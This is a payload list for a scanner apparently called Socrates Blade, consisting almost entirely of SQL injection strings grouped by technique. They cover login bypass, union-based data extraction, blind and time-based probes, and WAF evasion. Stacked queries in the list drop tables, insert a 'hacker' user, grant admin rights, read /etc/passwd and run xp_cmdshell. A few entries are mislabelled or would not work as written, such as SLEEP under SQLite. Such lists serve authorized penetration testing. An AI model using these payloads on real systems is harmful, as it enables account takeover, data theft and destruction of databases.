# SQL Injection Payloads for Socrates Blade v3.2
# These payloads are for authorized security testing only
# Format: One payload per line, lines starting with # are comments

# Basic error-based SQL injection
'
"
' OR 1=1 --
' OR '1'='1
' OR 1=1 #
' OR 1=1/*
admin' --
admin' #
' OR 'admin'='admin
' OR 1=1 LIMIT 1--
' OR 1=1 LIMIT 1#

# Union-based injection
' UNION SELECT NULL--
' UNION SELECT NULL,NULL--
' UNION SELECT NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL--
' UNION SELECT NULL,NULL,NULL,NULL,NULL--
1' UNION ALL SELECT NULL--
1' UNION ALL SELECT NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL--
1' UNION ALL SELECT NULL,NULL,NULL,NULL--
' UNION SELECT version()--
' UNION SELECT user()--
' UNION SELECT database()--
' UNION SELECT table_name FROM information_schema.tables--
' UNION SELECT column_name FROM information_schema.columns WHERE table_name='users'--

# Boolean-based blind injection
' AND 1=1 --
' AND 1=2 --
1' AND (SELECT COUNT(*) FROM users)>0--
1' AND (SELECT LENGTH(database()))>0--
1' AND (SELECT SUBSTRING(database(),1,1))='a'--
' AND (SELECT COUNT(*) FROM admin)>0--
' AND ASCII(SUBSTRING((SELECT database()),1,1))>97--

# Time-based MySQL injection (use {sleep_time} placeholder)
' OR IF(1=1, SLEEP({sleep_time}), 0) --
' OR IF(1=1, BENCHMARK({sleep_time},SHA1('test')), 0) --
1' AND (SELECT * FROM (SELECT(SLEEP({sleep_time})))a)--
1'; IF(1=1) SLEEP({sleep_time})--
1" AND SLEEP({sleep_time})--
1' OR SLEEP({sleep_time}) AND '1'='1
' AND SLEEP({sleep_time}) AND '1'='1
(SELECT * FROM (SELECT SLEEP({sleep_time}))a)
1' WAITFOR DELAY '0:0:{sleep_time}'--

# Time-based SQLite injection
' OR (SELECT 1 FROM (SELECT COUNT(*),1 AS b FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3) GROUP BY b) AS x) --
1' AND (SELECT COUNT(*) FROM sqlite_master)>0 AND SLEEP({sleep_time})--
1;SELECT CASE WHEN (1=1) THEN SLEEP({sleep_time}) ELSE 0 END--

# Stacked queries (MySQL)
'; DROP TABLE users--
'; INSERT INTO users VALUES(1,'hacker','password')--
'; UPDATE users SET admin=1 WHERE username='admin'--
'; DELETE FROM users WHERE 1=1--
'; SELECT * INTO OUTFILE '/tmp/test.txt'--
'; LOAD_FILE('/etc/passwd')--
'; exec xp_cmdshell 'dir'--

# Comment-based injection
1'/**/OR/**/1=1--
1'/*!50000UNION*/SELECT*/**/NULL--
1'/*!50000UNION*/SELECT*/**/NULL,NULL--
1'/*!50000UNION*/SELECT*/**/version()--
1'--/**/ORDER/**/BY/**/1--
1'/**/ORDER/**/BY/**/2--

# Pagination injection
1' LIMIT 1--
1' LIMIT 0,1--
1' LIMIT 1 OFFSET 0--
1' ORDER BY 1--
1' ORDER BY 2--
1' ORDER BY 3--
1' GROUP BY 1--
1' GROUP BY 1,2--
1' GROUP BY 1,2,3--

# String concatenation
1' AND 'a'='a'||'b
1' AND 'a'='a'+'b
1' AND 'a'='a' 'b
1' AND CHR(97)||CHR(98)=CHR(97)||CHR(98)

# Database version specific
# MySQL
' UNION SELECT @@version--
' UNION SELECT @@datadir--
' UNION SELECT LOAD_FILE('/etc/passwd')--

# PostgreSQL
1; SELECT pg_sleep({sleep_time})--
' OR 1=1; DROP TABLE users CASCADE--
1' AND 1=1; SELECT version()--

# MSSQL
1' WAITFOR DELAY '0:0:{sleep_time}'--
1'; EXEC xp_cmdshell 'dir'--
1' UNION SELECT NULL,NULL,@@version--

# Oracle
1' OR 1=1--
' UNION SELECT NULL FROM dual--
' OR 'x'='x' AND (SELECT COUNT(*) FROM user_tables)>0--

# JSON injection
{"username":"admin","password":"' OR '1'='1"}
{"username":"' OR 1=1--","password":"test"}
{"username":"admin","password":"' OR 1=1--"}

# Base64 encoded (for headers/cookies)
' UNION SELECT NULL-- (base64)
MScgVU5JT04gU0VMRUNUIE5VTEwtLQ==

# Second-order injection patterns
' INSERT INTO logs (msg) VALUES ('test')--
' UPDATE users SET password='hacked' WHERE username='admin'--

# Login bypass patterns
admin'--
admin' #
' OR 1=1 --
' OR '1'='1' --
' OR 'a'='a
') OR ('1'='1
") OR ("1"="1
' OR 1=1 LIMIT 1--
1' OR '1'='1
admin' OR '1'='1
' OR ''='
'--

# WAF bypass techniques
1'||'1'='1
1'&&'1'='1
1'%09OR%091=1
1'%0bOR%0b1=1
1'/**/OR/**/1=1
1'/*!50000OR*/1=1
1'/*!50000UNION*/SELECT*/1,2
1' OR 1=1 --
1' OR 'a'='a' LIMIT 1--
